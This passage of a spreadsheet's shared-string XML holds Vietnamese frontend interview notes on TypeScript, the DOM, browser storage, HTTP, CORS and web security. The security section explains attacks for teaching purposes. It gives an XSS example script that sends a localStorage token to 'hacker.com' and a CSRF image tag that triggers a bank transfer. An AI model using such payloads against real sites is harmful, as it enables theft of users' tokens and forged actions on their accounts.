    <t>TypeScript (Static typing): Bắt buộc khai báo kiểu dữ liệu ngay lúc viết code. Báo lỗi bằng gạch chân màu đỏ ngay trong trình soạn thảo (VS Code) trước cả khi bạn bấm chạy (compile-time).</t>
  </si>
  <si>
    <t>Vì sao nên dùng TypeScript?</t>
  </si>
  <si>
    <t>Bắt lỗi sớm: Diệt 80% bug ngớ ngẩn (như gõ sai chính tả tên biến, truyền nhầm chuỗi thay vì số) ngay lúc code.</t>
  </si>
  <si>
    <t>Gợi ý code (Autocomplete) tuyệt đỉnh: VS Code sẽ biết chính xác Object của bạn có những thuộc tính gì để gợi ý, không cần phải mò mẫm hay console.log ra xem nữa.</t>
  </si>
  <si>
    <t>Tự làm tài liệu: Đọc code TS có khai báo kiểu rõ ràng giúp các thành viên trong team hiểu ngay hàm này cần nhận vào cái gì và trả ra cái gì.</t>
  </si>
  <si>
    <t>Type inference là gì? (Suy luận kiểu)</t>
  </si>
  <si>
    <t>Bạn không cần lúc nào cũng phải viết rành rọt kiểu dữ liệu. TS rất thông minh, nếu bạn gán giá trị ngay lúc khởi tạo, nó sẽ tự động đoán (suy luận) ra kiểu của biến đó.</t>
  </si>
  <si>
    <t>// Bạn không cần viết: let name: string = "An"
let name = "An"; // TS tự ngầm hiểu 'name' là kiểu string
// name = 123;   // Báo lỗi đỏ ngay lập tức!</t>
  </si>
  <si>
    <t>any là gì?</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Là một kiểu dữ liệu "bất chấp". Khi bạn gán :any, bạn đang nói với TS: </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>"Đừng kiểm tra biến này, hãy để nó tự do như JavaScript cũ"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>Vì sao nên hạn chế any?</t>
  </si>
  <si>
    <t>Lạm dụng any sẽ phá hủy toàn bộ ý nghĩa của việc dùng TypeScript. Bạn sẽ mất đi tính năng báo lỗi sớm và tự động gợi ý code. Web của bạn lại dễ gặp bug runtime như hồi viết JS.</t>
  </si>
  <si>
    <t>unknown khác gì any?</t>
  </si>
  <si>
    <t>Cả hai đều chấp nhận mọi loại dữ liệu, nhưng unknown an toàn hơn any.
Với any: Bạn có thể gọi bất kỳ hàm nào trên nó, dù nó không tồn tại (gây lỗi khi chạy).
Với unknown: TS bắt buộc bạn phải kiểm tra kiểu (check type) trước khi được phép thao tác với nó.</t>
  </si>
  <si>
    <t>let theKhao: any = 10;
theKhao.toUpperCase(); // TS cho qua (any không quan tâm). Nhưng khi chạy sẽ LỖI vì số không có hàm viết hoa.
let anDanh: unknown = 10;
// anDanh.toUpperCase(); // TS BÁO LỖI NGAY LÚC CODE: Bạn không thể gọi hàm này khi chưa biết nó là gì!
if (typeof anDanh === "string") {
  anDanh.toUpperCase(); // Hợp lệ, vì TS biết chắc nó đã là chuỗi qua lệnh if.
}</t>
  </si>
  <si>
    <t>type và interface khác nhau thế nào?</t>
  </si>
  <si>
    <t>Về cơ bản chúng giống nhau 90%. Nhưng:
interface: Chỉ dùng để định nghĩa Object / Class. Có tính năng Declaration Merging (Nếu bạn khai báo 2 interface trùng tên, TS sẽ tự động gộp chúng lại làm 1).</t>
  </si>
  <si>
    <t>type (Type Alias): Dùng được cho mọi thứ (Object, Union |, Tuple, Nguyên thủy...). Không thể gộp nếu trùng tên.</t>
  </si>
  <si>
    <t>Optional property là gì?</t>
  </si>
  <si>
    <t>Thuộc tính không bắt buộc. Đặt dấu ? trước dấu :.</t>
  </si>
  <si>
    <t>interface User {
  name: string;
  age?: number; // Cung cấp cũng được, không có cũng không sao (sẽ mang giá trị undefined)
}
const u1: User = { name: "An" }; // Hợp lệ</t>
  </si>
  <si>
    <t>Readonly property là gì?</t>
  </si>
  <si>
    <t>Thuộc tính chỉ được đọc (gán giá trị 1 lần lúc tạo), không được phép sửa đổi về sau.</t>
  </si>
  <si>
    <t>interface Book {
  readonly id: number;
  title: string;
}
const b: Book = { id: 1, title: "Doraemon" };
// b.id = 2; // LỖI: Thuộc tính này là Read-only (chỉ đọc)</t>
  </si>
  <si>
    <t>Enum là gì?</t>
  </si>
  <si>
    <t>Là "Kiểu liệt kê". Cho phép bạn định nghĩa một tập hợp các hằng số có tên để code dễ đọc hơn. Nếu không khai báo giá trị, nó sẽ tự đánh số từ 0.</t>
  </si>
  <si>
    <t>enum TrangThaiDonHang {
  ChoXuLy,    // 0
  DangGiao,   // 1
  HoanThanh   // 2
}
let tt = TrangThaiDonHang.DangGiao; // Nhìn code cực kỳ dễ hiểu thay vì viết số 1</t>
  </si>
  <si>
    <t>Generic là gì?</t>
  </si>
  <si>
    <t>Giống như bạn truyền tham số (parameter) vào hàm, Generic là việc bạn truyền tham số kiểu dữ liệu vào một Type/Interface/Hàm. Thường dùng chữ T, K, V.</t>
  </si>
  <si>
    <t>function traVe&lt;T&gt;(giaTri: T): T {
  return giaTri;
}
traVe&lt;string&gt;("Hello"); // T sẽ là string
traVe&lt;number&gt;(123);     // T sẽ là number</t>
  </si>
  <si>
    <t>Vì sao cần generic?</t>
  </si>
  <si>
    <t>Để viết code tái sử dụng được nhiều lần với nhiều kiểu dữ liệu khác nhau mà không bị mất Type Safety (không phải dùng đến any).</t>
  </si>
  <si>
    <t>onditional type là gì?</t>
  </si>
  <si>
    <t>Dùng logic if...else (toán tử ba ngôi ? :) ngay trong việc xác định kiểu dữ liệu.</t>
  </si>
  <si>
    <t>type KiemTra&lt;T&gt; = T extends string ? "Là Chuỗi" : "Không Phải Chuỗi";
type A = KiemTra&lt;string&gt;; // "Là Chuỗi"</t>
  </si>
  <si>
    <t>as const làm gì?</t>
  </si>
  <si>
    <t>Khóa chặt một biến. Biến Array thành Tuple readonly, biến Object thành Readonly, biến String thành Literal type.</t>
  </si>
  <si>
    <t>const routes = ["GET", "POST"] as const; 
// routes không còn là mảng string chung chung, mà chết cứng là tuple readonly ["GET", "POST"]</t>
  </si>
  <si>
    <t>Non-null assertion ! là gì?</t>
  </si>
  <si>
    <t>Thêm ! vào cuối biến để "thề" với TS rằng: "Biến này chắc chắn không bao giờ bị null hay undefined đâu, đừng báo lỗi nữa".</t>
  </si>
  <si>
    <t>Module declaration &amp; 25. Declaration file .d.ts là gì?</t>
  </si>
  <si>
    <t>Khi bạn cài một thư viện JS cũ (không viết bằng TS), TS sẽ không hiểu thư viện đó có hàm gì. Bạn phải tạo file .d.ts (Declaration file) để "khai báo suông" các kiểu dữ liệu cho thư viện đó, giúp TS không báo lỗi.</t>
  </si>
  <si>
    <t>tsconfig.json gồm gì?</t>
  </si>
  <si>
    <t>File cấu hình trung tâm của TS. Cấu hình đường dẫn build (outDir, rootDir), môi trường (target ES6 hay ES5), và các quy tắc chặt chẽ.</t>
  </si>
  <si>
    <t>Làm sao type props React tốt?</t>
  </si>
  <si>
    <t>Dùng interface hoặc type để định nghĩa Props rõ ràng.
Children: Luôn type children là React.ReactNode.
Events: Tận dụng các type có sẵn của React như React.MouseEvent&lt;HTMLButtonElement&gt;, React.ChangeEvent&lt;HTMLInputElement&gt;.</t>
  </si>
  <si>
    <t>interface ButtonProps {
  label: string;
  onClick: (e: React.MouseEvent&lt;HTMLButtonElement&gt;) =&gt; void;
  disabled?: boolean;
}
const Button = ({ label, onClick, disabled }: ButtonProps) =&gt; {
  return &lt;button onClick={onClick} disabled={disabled}&gt;{label}&lt;/button&gt;;
};</t>
  </si>
  <si>
    <t>DOM là gì?</t>
  </si>
  <si>
    <t>DOM (Document Object Model) là một giao diện lập trình (API) do trình duyệt cung cấp. Nó đọc file HTML của bạn và biến đổi thành một cấu trúc dữ liệu dạng cây, giúp JavaScript có thể hiểu, truy cập và thay đổi nội dung/giao diện trang web.</t>
  </si>
  <si>
    <t>Browser biến file HTML thành một “cây object” trong bộ nhớ → đó gọi là DOM.&lt;body&gt;
  &lt;h1 id="title"&gt;Xin chào&lt;/h1&gt;
  &lt;button&gt;Đổi chữ&lt;/button&gt;
&lt;/body&gt;</t>
  </si>
  <si>
    <t>Browser sẽ hiểu thành cây DOM kiểu:
Document
 └── html
      └── body
           ├── h1
           │    └── "Xin chào"
           └── button
                └── "Đổi chữ"</t>
  </si>
  <si>
    <t>DOM tree là gì?DOM tree là gì?</t>
  </si>
  <si>
    <t>Là "Cây DOM". Cấu trúc phân cấp của trang web. Gốc là document, tỏa ra nhánh &lt;html&gt;, rồi chia thành &lt;head&gt; và &lt;body&gt;, bên trong lại có các thẻ con lồng nhau tạo thành hình dáng một cái cây ngược.</t>
  </si>
  <si>
    <t>querySelector và getElementById khác nhau thế nào?</t>
  </si>
  <si>
    <t>getElementById('myId'): Cực kỳ nhanh, trả về 1 phần tử. Cú pháp chỉ nhận ID</t>
  </si>
  <si>
    <t>querySelector('.myClass &gt; p'): Chậm hơn một chút nhưng vô cùng mạnh mẽ vì nó nhận vào cú pháp CSS Selector. Trả về phần tử đầu tiên khớp với điều kiện.</t>
  </si>
  <si>
    <t>Event bubbling là gì? (Sủi bọt)</t>
  </si>
  <si>
    <t>Khi bạn click vào một phần tử con (VD: thẻ &lt;span&gt;), sự kiện sẽ kích hoạt ở phần tử đó trước, sau đó "sủi bọt" ngược lên các phần tử cha (&lt;p&gt; -&gt; &lt;div&gt; -&gt; &lt;body&gt; -&gt; document). Đây là hành vi mặc định của hầu hết sự kiện.</t>
  </si>
  <si>
    <t>event.target và event.currentTarget khác nhau thế nào?</t>
  </si>
  <si>
    <t>event.target: Là phần tử thực sự bị click (VD: thẻ &lt;li&gt; bạn vừa bấm).</t>
  </si>
  <si>
    <t>event.currentTarget: Là phần tử đang gắn cái event listener đó (VD: thẻ &lt;ul&gt; cha).</t>
  </si>
  <si>
    <t>Virtual DOM khác DOM thật thế nào?</t>
  </si>
  <si>
    <t>DOM thật (Real DOM): Thao tác rất chậm và nặng nề. Cập nhật 1 thứ nhỏ cũng có thể làm trình duyệt vẽ lại cả trang.</t>
  </si>
  <si>
    <t>Virtual DOM (DOM Ảo - dùng trong React/Vue): Là một bản sao lưu của DOM thật dưới dạng một Object JavaScript siêu nhẹ. Khi có thay đổi, React cập nhật DOM Ảo trước, so sánh (diffing) xem có gì khác bản cũ không, rồi mới gộp các thay đổi đó lại và cập nhật lên DOM Thật chỉ 1 lần duy nhất tại đúng chỗ cần sửa.</t>
  </si>
  <si>
    <t>Cookie là gì?</t>
  </si>
  <si>
    <t>Là những đoạn dữ liệu siêu nhỏ (tối đa khoảng 4KB) do Trình duyệt lưu trữ. Nó thường được Server tạo ra và gửi xuống, hoặc JS tự tạo. Mục đích chính của Cookie là để "nhớ" xem người dùng là ai (quản lý phiên đăng nhập/session).</t>
  </si>
  <si>
    <t>LocalStorage là gì?</t>
  </si>
  <si>
    <t>Kho lưu trữ dữ liệu dạng key-value trên trình duyệt với dung lượng khá lớn (thường là 5MB - 10MB). Dữ liệu ở đây tồn tại vĩnh viễn cho đến khi bạn dùng code JS để xóa hoặc người dùng chủ động vào cài đặt trình duyệt để xóa (clear data).</t>
  </si>
  <si>
    <t>SessionStorage là gì?</t>
  </si>
  <si>
    <t>Giống hệt LocalStorage về dung lượng và cách dùng, nhưng vòng đời của nó rất ngắn. Nó chỉ tồn tại trong một phiên (1 tab hoặc 1 cửa sổ). Nếu bạn đóng tab đó lại, toàn bộ dữ liệu trong SessionStorage sẽ bị bốc hơi ngay lập tức. (Rất hợp để lưu state của các form đang nhập dở).</t>
  </si>
  <si>
    <t>IndexedDB là gì?</t>
  </si>
  <si>
    <t>Là một hệ cơ sở dữ liệu (Database) thực thụ nằm ngay bên trong trình duyệt. Nó dùng để lưu trữ các cấu trúc dữ liệu khổng lồ (vài trăm MB đến vài GB), các file, hình ảnh tĩnh. Nó hoạt động bất đồng bộ (Promise/async) để không làm đơ giao diện web.</t>
  </si>
  <si>
    <t>Cookie vs LocalStorage khác nhau lớn nhất ở đâu?</t>
  </si>
  <si>
    <t>Dung lượng: Cookie quá nhỏ (4KB), LocalStorage lớn (5MB).</t>
  </si>
  <si>
    <t>Mạng lưới (Quan trọng nhất): LocalStorage chỉ nằm im trên máy tính của bạn. Còn Cookie thì tự động bám theo mọi request (HTTP) bạn gửi lên Server.</t>
  </si>
  <si>
    <t>Bảo mật Cookie (Cookie Flags)</t>
  </si>
  <si>
    <t>Bởi vì Cookie tự động bay lên Server, nó trở thành mục tiêu tấn công số 1 của Hacker. Ta phải dùng các cờ (flags) sau để khóa nó lại</t>
  </si>
  <si>
    <t>HttpOnly
Chặn JavaScript đọc cookie
Đây là flag rất quan trọng.
Ví dụ cookie:
Set-Cookie:
token=abc123;
HttpOnly
JS sẽ không đọc được
document.cookie
Không lấy được token.</t>
  </si>
  <si>
    <t>HttpOnly cookie là gì?</t>
  </si>
  <si>
    <t>Là một cờ bảo mật do Server cài đặt. Khi Cookie có cờ này, JavaScript ở client không thể đọc được nó (lệnh document.cookie sẽ bị vô hiệu hóa đối với cookie đó). Nó giúp chống lại việc Hacker chèn mã độc JS vào web để ăn cắp Cookie.</t>
  </si>
  <si>
    <t>Secure cookie là gì?</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Cờ bảo mật bắt buộc Cookie </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>chỉ được phép truyền đi qua mạng mã hóa (HTTPS)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>. Nếu bạn đang dùng HTTP thường, cookie này sẽ không được gửi đi, tránh việc bị nghe lén dữ liệu trên đường truyền (Man-in-the-middle attack).</t>
    </r>
  </si>
  <si>
    <t>3. Authentication (Xác thực) &amp; Bảo mật Token
10. XSS liên quan storage như thế nào?</t>
  </si>
  <si>
    <t>XSS (Cross-Site Scripting): Là lỗ hổng cho phép Hacker chèn lén một đoạn code JavaScript độc hại vào trang web của bạn (ví dụ: qua ô comment).</t>
  </si>
  <si>
    <t>Liên quan tới Storage: Vì mã JS của Hacker chạy trên chính trình duyệt của bạn, nó có toàn quyền gõ lệnh localStorage.getItem('token'). Nếu bạn lưu Token đăng nhập ở LocalStorage, Hacker sẽ lấy được và gửi về máy chủ của chúng.</t>
  </si>
  <si>
    <t>Cache Storage là gì?</t>
  </si>
  <si>
    <t>Là một API lưu trữ đặc biệt trên trình duyệt, chuyên dùng để cất giữ các bộ phản hồi từ mạng (Request và Response HTTP). Khác với cache tĩnh của trình duyệt, Cache Storage được lập trình viên điều khiển 100% bằng JavaScript (Thường là thông qua Service Worker).</t>
  </si>
  <si>
    <t>HTTP và HTTPS khác nhau thế nào?</t>
  </si>
  <si>
    <t>Bảo mật: HTTP truyền dữ liệu dưới dạng văn bản thuần (dễ bị hacker nghe lén và đọc được, ví dụ như password). HTTPS truyền dữ liệu dưới dạng mã hóa lộn xộn.</t>
  </si>
  <si>
    <t>Cổng (Port): HTTP mặc định dùng cổng 80, HTTPS dùng cổng 443.</t>
  </si>
  <si>
    <t>SEO: Google ưu tiên xếp hạng các trang web dùng HTTPS.</t>
  </si>
  <si>
    <t>TLS là gì?</t>
  </si>
  <si>
    <t>TLS (Transport Layer Security) là công nghệ mã hóa đứng đằng sau HTTPS (nó là bản nâng cấp hiện đại của SSL).</t>
  </si>
  <si>
    <t xml:space="preserve"> Nó giống như một cái ống nước bọc thép, đảm bảo dữ liệu chạy bên trong không bị rò rỉ hay thay đổi trên đường truyền.</t>
  </si>
  <si>
    <t>Request và response gồm những phần nào?</t>
  </si>
  <si>
    <t>Request (Yêu cầu gửi đi): Gồm 3 phần: Start line (Method + URL + Version), Headers (Thông tin mô tả metadata), và Body (Dữ liệu gửi kèm, thường dùng trong POST/PUT).</t>
  </si>
  <si>
    <t>Response (Phản hồi trả về): Gồm 3 phần: Status line (Version + Status Code), Headers, và Body (Dữ liệu server trả về, ví dụ như cục JSON hay file HTML).</t>
  </si>
  <si>
    <t>Header là gì?</t>
  </si>
  <si>
    <t>Header là phần chứa các "siêu dữ liệu" (metadata) đi kèm trong Request hoặc Response. Giống như cái phong bì thư ghi rõ người gửi, người nhận, định dạng thư. Các header phổ biến:</t>
  </si>
  <si>
    <t xml:space="preserve"> Content-Type (báo định dạng data là JSON hay Text), Authorization (chứa token đăng nhập), User-Agent (thông tin trình duyệt đang dùng).</t>
  </si>
  <si>
    <t>PUT và PATCH khác nhau thế nào?</t>
  </si>
  <si>
    <t>Cả hai đều dùng để Cập nhật (Update).
PUT: Cập nhật toàn bộ. Bạn gửi lên 1 object mới, nó sẽ ghi đè xóa sạch object cũ. (Ví dụ: Bạn đổi avatar nhưng phải gửi lên cả tên, tuổi, email).</t>
  </si>
  <si>
    <t>PATCH: Cập nhật một phần. Gửi lên trường nào thì nó chỉ sửa trường đó, giữ nguyên các trường khác. (Ví dụ: Chỉ gửi mỗi avatar mới).</t>
  </si>
  <si>
    <t>DELETE có body được không?</t>
  </si>
  <si>
    <t>Về mặt lý thuyết (theo chuẩn RFC), bạn có thể nhét body vào DELETE. Nhưng trên thực tế, rất nhiều Server, Proxy hoặc thư viện API sẽ tự động lờ đi (bỏ qua) cái body này.</t>
  </si>
  <si>
    <t>Vì vậy, tốt nhất là không nên dùng body cho DELETE, hãy truyền ID qua URL (DELETE /users/123).</t>
  </si>
  <si>
    <t>401 và 403 khác nhau thế nào?</t>
  </si>
  <si>
    <t>401 Unauthorized: "Bạn là ai?". Khách lạ chưa đăng nhập, hoặc Token bị hết hạn.</t>
  </si>
  <si>
    <t>403 Forbidden: "Tôi biết bạn là ai, nhưng bạn KHÔNG ĐƯỢC VÀO". Đã đăng nhập, nhưng bạn chỉ là User thường, cố tình bấm vào link dành cho Admin.</t>
  </si>
  <si>
    <t>REST API là gì?</t>
  </si>
  <si>
    <t xml:space="preserve">REST (Representational State Transfer) là một bộ quy tắc thiết kế API. </t>
  </si>
  <si>
    <t>Nó sử dụng các phương thức HTTP (GET, POST, PUT, DELETE) và các đường dẫn URL (như /users, /products) để tương tác với dữ liệu (tài nguyên).</t>
  </si>
  <si>
    <t>RESTful là gì?</t>
  </si>
  <si>
    <t>Một hệ thống API được gọi là "RESTful" khi nó tuân thủ chặt chẽ và tuyệt đối các nguyên tắc của REST (đặc biệt là tính Stateless - không lưu trạng thái client trên server, và cấu trúc URL chuẩn mực).</t>
  </si>
  <si>
    <t>GraphQL là gì?</t>
  </si>
  <si>
    <t>Một ngôn ngữ truy vấn API do Facebook tạo ra. Thay vì có nhiều đường dẫn URL, GraphQL chỉ có 1 endpoint duy nhất (VD: /graphql).</t>
  </si>
  <si>
    <t>ự khác biệt hình dáng gọi API: REST vs GraphQL</t>
  </si>
  <si>
    <t>A. Dùng REST API (Phải gọi 2 lần hoặc Server phải chế API riêng):
JavaScript
// Bước 1: Lấy thông tin user
const user = await fetch('/api/users/1').then(r =&gt; r.json());
// Bước 2: Lấy bài viết của user đó
const posts = await fetch(`/api/users/1/posts`).then(r =&gt; r.json());</t>
  </si>
  <si>
    <t>Dùng GraphQL (Chỉ gọi 1 lần, lấy đúng thứ mình cần):
JavaScript
// Gửi lên 1 câu Query duy nhất đến đúng 1 endpoint /graphql
const query = `
  query {
    user(id: 1) {
      name
      posts { title }
    }
  }
`;
const data = await fetch('/graphql', {
  method: 'POST',
  body: JSON.stringify({ query })
}).then(r =&gt; r.json()); 
// Trả về đúng name và title, không bị dư thừa dữ liệu (Over-fetching)</t>
  </si>
  <si>
    <t>gRPC là gì?</t>
  </si>
  <si>
    <t>Một framework siêu tốc độ do Google phát triển. Nó truyền dữ liệu dưới dạng nhị phân (Binary) thay vì dạng chữ (JSON) như REST, và chạy trên nền HTTP/2. Thường được dùng để các Server (Microservices) nói chuyện nội bộ với nhau cho lẹ, hiếm khi dùng cho Trình duyệt.</t>
  </si>
  <si>
    <t>Một giao thức kết nối hai chiều, liên tục giữa Client và Server. Mở 1 lần, xài mãi mãi. Client có thể gửi data lên, Server có thể chủ động đẩy data xuống bất kỳ lúc nào mà không cần ai hỏi trước.</t>
  </si>
  <si>
    <t>// Chỉ kết nối 1 lần duy nhất
const ws = new WebSocket('wss://chat.example.com');
// Ngồi chơi xơi nước, khi nào Server có tin, nó tự đẩy xuống đây
ws.onmessage = (event) =&gt; {
  console.log("Server vừa đẩy tin nhắn xuống:", event.data);
};
// Client cũng có thể chủ động gửi tin lên bất cứ lúc nào
ws.send("Hello Server!");</t>
  </si>
  <si>
    <t>. Khi nào dùng WebSocket?
Khi cần tốc độ phản hồi tính bằng mili-giây và tương tác hai chiều liên tục:
Ứng dụng Chat (Messenger, Zalo).
Game online nhiều người chơi.
Cùng nhau chỉnh sửa tài liệu trực tiếp (Google Docs, Figma).</t>
  </si>
  <si>
    <t>Cursor Pagination (Truyền ID điểm mốc)?</t>
  </si>
  <si>
    <t xml:space="preserve">Hình dáng URL: GET /api/products?afterId=8f7A2&amp;limit=20
</t>
  </si>
  <si>
    <t>Ý nghĩa: "Ê Server, trả cho tao 20 bài viết CŨ HƠN cái bài có ID là 8f7A2".
Ưu điểm: Cực kỳ nhanh, không bao giờ bị xô lệch dữ liệu. Rất hợp làm chức năng vuốt xem video như TikTok hoặc Facebook Feed.</t>
  </si>
  <si>
    <t>Filtering và Sorting API nên thiết kế thế nào?</t>
  </si>
  <si>
    <t>Nên dùng Query Parameters trên URL.
Lọc (Filtering): GET /users?role=admin&amp;age=20</t>
  </si>
  <si>
    <t>Sắp xếp (Sorting): GET /users?sort=-createdAt (Dấu trừ biểu thị xếp giảm dần/mới nhất lên đầu).</t>
  </si>
  <si>
    <t>API Versioning là gì?</t>
  </si>
  <si>
    <t xml:space="preserve">Đánh phiên bản cho API (VD: /v1/users và /v2/users). Khi ứng dụng lớn lên, bạn muốn sửa cấu trúc dữ liệu nhưng không muốn làm "chết" các phiên bản App di động cũ mà người dùng chưa chịu cập nhật. </t>
  </si>
  <si>
    <t>Bản mới xài v2, bản cũ vẫn gọi v1 bình thường.</t>
  </si>
  <si>
    <t>Rate limiting là gì?</t>
  </si>
  <si>
    <t xml:space="preserve">Giới hạn tốc độ gọi API. Ví dụ: "Mỗi địa chỉ IP chỉ được gọi API Đăng nhập tối đa 5 lần / 1 phút". </t>
  </si>
  <si>
    <t>Để chống lại Hacker dùng tool dò mật khẩu (Brute-force) hoặc chống DDoS làm sập web.</t>
  </si>
  <si>
    <t>AbortController dùng để làm gì?</t>
  </si>
  <si>
    <t xml:space="preserve">Là một API của Trình duyệt giúp bạn hủy (cancel) một API Request đang gọi dở dang.
Ví dụ kinh điển: Bạn làm ô Search. Khách gõ chữ "A" (gọi API 1), khách gõ tiếp chữ "B" (thành "AB", gọi API 2). </t>
  </si>
  <si>
    <t>Bạn phải dùng AbortController để hủy ngay cái API 1 đi, nếu không API 1 trả về chậm hơn API 2, giao diện sẽ hiển thị kết quả bị sai!</t>
  </si>
  <si>
    <t>// Ví dụ AbortController
const controller = new AbortController();
fetch('/api/search?q=AB', { signal: controller.signal })
  .then(res =&gt; res.json());
// Khách gõ chữ mới? Hủy ngay cái fetch đang chạy dở ở trên!
controller.abort();</t>
  </si>
  <si>
    <t>CORS là gì?</t>
  </si>
  <si>
    <t>CORS (Cross-Origin Resource Sharing) là một cơ chế cho phép trình duyệt "bẻ luật" Same-Origin Policy một cách an toàn, để Frontend ở domain này có thể gọi API ở domain khác.</t>
  </si>
  <si>
    <t>Ví dụ: Frontend chạy ở http://localhost:3000 gọi API ở [https://api.myapp.com](https://api.myapp.com). Nếu không có CORS setup ở server, trình duyệt sẽ khóa mỏm request này lại và quăng lỗi đỏ lòm.</t>
  </si>
  <si>
    <t>Same-origin policy (SOP) là gì?</t>
  </si>
  <si>
    <t>Đây là "bức tường lửa" mặc định của trình duyệt. Nó quy định: JS ở trang web A chỉ được phép đọc dữ liệu từ trang web A (Cùng Giao thức + Tên miền + Cổng).</t>
  </si>
  <si>
    <t xml:space="preserve"> Cấm tuyệt đối việc thò tay sang trang web B lấy trộm dữ liệu.</t>
  </si>
  <si>
    <t>Access-Control-Allow-Origin là gì?</t>
  </si>
  <si>
    <t>Là Header do Server trả về để báo cho trình duyệt biết: "Tôi cho phép những domain này lấy data của tôi".</t>
  </si>
  <si>
    <t>Ví dụ: Access-Control-Allow-Origin: [https://myfrontend.com](https://myfrontend.com) (Chỉ web này được lấy) hoặc * (Web nào cũng được lấy).</t>
  </si>
  <si>
    <t>Credentials trong CORS là gì?</t>
  </si>
  <si>
    <t>Là cờ hiệu báo cho trình duyệt biết: "Hãy gửi kèm Cookie đăng nhập và HTTP Auth Headers sang domain khác nhé".</t>
  </si>
  <si>
    <t>Ví dụ: Trong fetch API, bạn viết fetch(url, { credentials: 'include' }). Lúc này, ở Server bắt buộc phải set header Access-Control-Allow-Credentials: true và Allow-Origin KHÔNG ĐƯỢC dùng dấu *.</t>
  </si>
  <si>
    <t>CSRF là gì (Cross-Site Request Forgery)?</t>
  </si>
  <si>
    <t>Tấn công giả mạo yêu cầu. Hacker lừa bạn bấm vào một link/ảnh độc hại trên web của họ. Vì trình duyệt tự động gửi Cookie kèm theo request, tài khoản của bạn (đang đăng nhập ở web gốc) sẽ vô tình thực hiện hành động do hacker giật dây.</t>
  </si>
  <si>
    <t>Ví dụ: Bạn lướt web hacker, vô tình load &lt;img src="[https://bank.com/chuyen-tien?den=Hacker&amp;tien=1000](https://bank.com/chuyen-tien?den=Hacker&amp;tien=1000)"&gt;. Mất 1000 đô mà không biết!</t>
  </si>
  <si>
    <t>XSS là gì (Cross-Site Scripting)?</t>
  </si>
  <si>
    <t>Hacker chèn được mã JavaScript độc hại vào trang web của bạn (thường qua các ô comment, search chưa được filter). Khi người dùng bình thường vào web, đoạn JS đó sẽ chạy và ăn cắp Token/Cookie của họ.</t>
  </si>
  <si>
    <t>Ví dụ: Hacker nhập comment: &lt;script&gt;fetch('hacker.com?token=' + localStorage.getItem('token'))&lt;/script&gt;.</t>
  </si>
  <si>
    <t>SQL Injection có liên quan frontend không?</t>
  </si>
  <si>
    <t>Về bản chất là KHÔNG. Đây là lỗi hoàn toàn do Backend xử lý chuỗi SQL lỏng lẻo.
Tuy nhiên, Frontend có liên quan một chút ở khâu Validation (Xác thực dữ liệu đầu vào).</t>
  </si>
  <si>
    <t>Bạn nên chặn các ký tự lạ (' -- ;) ngay từ form HTML để giảm tải request rác cho Backend, nhưng KHÔNG BAO GIỜ được coi Frontend là chốt chặn SQL Injection cuối cùng.</t>
  </si>
  <si>
    <t>Content Security Policy (CSP) là gì?</t>
  </si>
  <si>
    <t>Là "khiên chống XSS" tốt nhất. Nó là một HTTP Header do Server trả về để ra lệnh cho trình duyệt: "Chỉ được phép chạy JS tải từ domain nhà tao, cấm tiệt chạy JS inline &lt;script&gt; hoặc JS tải từ nguồn lạ".</t>
  </si>
  <si>
    <t>Ví dụ: Content-Security-Policy: default-src 'self'</t>
  </si>
  <si>
    <t>OAuth là gì?</t>
  </si>
  <si>
    <t>Tiêu chuẩn ủy quyền mở. Nó cho phép người dùng cấp quyền cho ứng dụng thứ 3 (như game, app web) truy cập thông tin của họ mà không cần phải đưa mật khẩu.</t>
  </si>
  <si>
    <t>Ví dụ: Nút "Đăng nhập bằng Google/Facebook" trên các website.</t>
  </si>
  <si>
    <t>JWT (JSON Web Token) là gì?</t>
  </si>
  <si>
    <t>Là một chuẩn thẻ ID (chứng minh thư) điện tử. Server cấp cho Frontend lúc đăng nhập.Nó chứa sẵn dữ liệu (như userId, role) và có "Chữ ký mã hóa" của Server để chống làm giả.</t>
  </si>
  <si>
    <t>JWT gồm những phần nào?
Gồm 3 phần cách nhau bằng dấu chấm (.):
Header: Chứa tên thuật toán mã hóa (VD: HS256).
Payload (Data): Chứa thông tin (VD: { "userId": 1, "role": "admin" }). Phần này ai cũng ĐỌC được (Decode là ra). Đừng bao giờ nhét mật khẩu vào đây!
Signature (Chữ ký): Được hash (băm) từ Header + Payload + Secret Key của Backend. Mất 1 chữ cái ở Payload là chữ ký sẽ sai, Server sẽ từ chối.</t>
  </si>
  <si>
    <t>Access token và refresh token khác nhau thế nào?</t>
  </si>
  <si>
    <t>Access Token: Dùng để gọi API. Thời gian sống RẤT NGẮN (15p - 1 tiếng) để lỡ hacker trộm được thì nó cũng mau hết hạn.</t>
  </si>
  <si>
    <t>Refresh Token: Dùng để đi xin Access Token mới khi cái cũ hết hạn. Thời gian sống RẤT DÀI (vài tuần - vài tháng). Phải được cất giấu cực kỳ cẩn thận (thường để ở HTTP-only Cookie).</t>
  </si>
  <si>
    <t>Token hết hạn xử lý thế nào?</t>
  </si>
  <si>
    <t>Khi Frontend gọi API bị trả về lỗi 401 Unauthorized -&gt; Frontend bắt lỗi đó (dùng Axios Interceptors) -&gt; Tự động gọi API /refresh-token để lấy Access Token mới -&gt; Gửi lại cái request vừa bị xịt lúc nãy một cách ngầm định (người dùng không hề biết).</t>
  </si>
  <si>
    <t>Session-based auth vs token-based auth?</t>
  </si>
  <si>
